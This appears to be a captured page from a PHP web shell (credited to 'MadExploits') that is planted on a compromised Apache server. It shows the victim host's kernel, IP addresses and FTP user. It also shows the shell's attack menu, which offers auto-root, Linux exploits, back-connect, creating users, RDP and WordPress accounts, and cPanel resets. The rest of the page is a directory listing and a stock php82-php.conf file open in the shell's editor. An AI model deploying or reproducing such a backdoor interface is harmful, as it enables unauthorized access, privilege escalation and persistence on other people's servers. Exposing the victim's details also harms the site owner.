Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
httpd /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
400
B
-rw-r--r--
autoindex.conf
2.86
KB
-rw-r--r--
awstats.conf
1.18
KB
-rw-r--r--
fcgid.conf
496
B
-rw-r--r--
php.conf
1.61
KB
-rw-r--r--
php.conf.rpmnew
1.58
KB
-rw-r--r--
php56-php.conf
1.51
KB
-rw-r--r--
php70-php.conf
1.63
KB
-rw-r--r--
php71-php.conf
1.63
KB
-rw-r--r--
php72-php.conf
1.64
KB
-rw-r--r--
php73-php.conf
1.64
KB
-rw-r--r--
php74-php.conf
1.64
KB
-rw-r--r--
php80-php.conf
1.69
KB
-rw-r--r--
php81-php.conf
1.69
KB
-rw-r--r--
php82-php.conf
1.69
KB
-rw-r--r--
php83-php.conf
1.69
KB
-rw-r--r--
ssl.conf
8.55
KB
-rw-r--r--
userdir.conf
1.2
KB
-rw-r--r--
webalizer.conf
302
B
-rw-r--r--
welcome.conf
587
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php82-php.conf
# # The following lines prevent .user.ini files from being viewed by Web clients. # <Files ".user.ini"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all Satisfy All </IfModule> </Files> # # Allow php to handle Multiviews # AddType text/html .php # # Add index.php to the list of files that will be served as directory # indexes. # DirectoryIndex index.php # mod_php options <IfModule mod_php.c> # # Cause the PHP interpreter to handle files with a .php extension. # <FilesMatch \.(php|phar)$> SetHandler application/x-httpd-php </FilesMatch> # # Uncomment the following lines to allow PHP to pretty-print .phps # files as PHP source code: # #<FilesMatch \.phps$> # SetHandler application/x-httpd-php-source #</FilesMatch> # # Apache specific PHP configuration options # those can be override in each configured vhost # php_value session.save_handler "files" php_value session.save_path "/var/opt/remi/php82/lib/php/session" php_value soap.wsdl_cache_dir "/var/opt/remi/php82/lib/php/wsdlcache" #php_value opcache.file_cache "/var/opt/remi/php82/lib/php/opcache" </IfModule> # Redirect to local php-fpm if mod_php (5, 7 or 8) is not available <IfModule !mod_php5.c> <IfModule !mod_php7.c> <IfModule !mod_php.c> # Enable http authorization headers SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1 <FilesMatch \.(php|phar)$> SetHandler "proxy:unix:/var/opt/remi/php82/run/php-fpm/www.sock|fcgi://localhost" </FilesMatch> </IfModule> </IfModule> </IfModule>
Close